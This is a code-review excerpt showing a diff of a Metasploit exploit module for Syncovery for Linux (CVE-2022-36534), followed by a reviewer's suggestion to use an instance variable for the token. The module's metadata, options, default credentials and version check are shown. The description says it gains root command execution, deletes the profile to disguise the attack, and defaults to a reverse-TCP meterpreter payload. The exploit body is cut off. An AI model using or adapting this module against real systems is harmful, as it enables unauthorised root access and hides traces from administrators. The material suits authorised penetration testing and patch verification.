modules/exploits/unix/http/syncovery_linux_rce_2022_36534.rb

```diff
@@ -0,0 +1,238 @@
+          Successful exploitation results in remote code execution under the context of the root user.
+
+          Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.
+          Jobs can contain arbitrary system commands and will be executed as root.
+          A valid username and password or a session token is needed to exploit the vulnerability.
+          The profile will be deleted afterwards to disguise the attack. IOC_IN_LOGS are present, but can be deleted manually.
+
+          The vulnerability is known to work on Linux platforms. All Syncovery versions prior to v9.48j are vulnerable including all versions of branch 8.
+        },
+        'Author' => [ 'Jan Rude' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],
+          ['CVE', '2022-36534']
+        ],
+        'Platform' => 'unix',
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          ['Syncovery for Linux < 9.48j', {}]
+        ],
+        'Privileged' => true,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DisclosureDate' => '2022-09-06',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
+        OptString.new('USERNAME', [true, 'The username to Syncovery (default: default)', 'default']),
+        OptString.new('PASSWORD', [true, 'The password to Syncovery (default: pass)', 'pass']),
+        OptString.new('TOKEN', [false, 'A valid session token', '']),
+        OptString.new('TARGETURI', [true, 'The path to Syncovery', '/']),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
+      'method' => 'GET'
+    )
+
+    if res && res.code == 200
+      json_res = res.get_json_document
+      if json_res['isSyncoveryWindows'] == 'false'
+        version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
+        if version.empty?
+          vprint_warning("#{peer} - Could not identify version")
+          Exploit::CheckCode::Detected
+        elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48')
+          vprint_good("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Appears
+        else
+          vprint_status("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Safe
+        end
+      else
+        Exploit::CheckCode::Safe
+      end
+    else
+      Exploit::Unknown
+    end
+  end
+
+  def exploit
+    token = datastore['TOKEN']
+    if token.blank?
```

Comment:
Now that you're using an instance variable, the local variable needs to be updated too.
```suggestion
    @token = datastore['TOKEN']
    if @token.blank?
```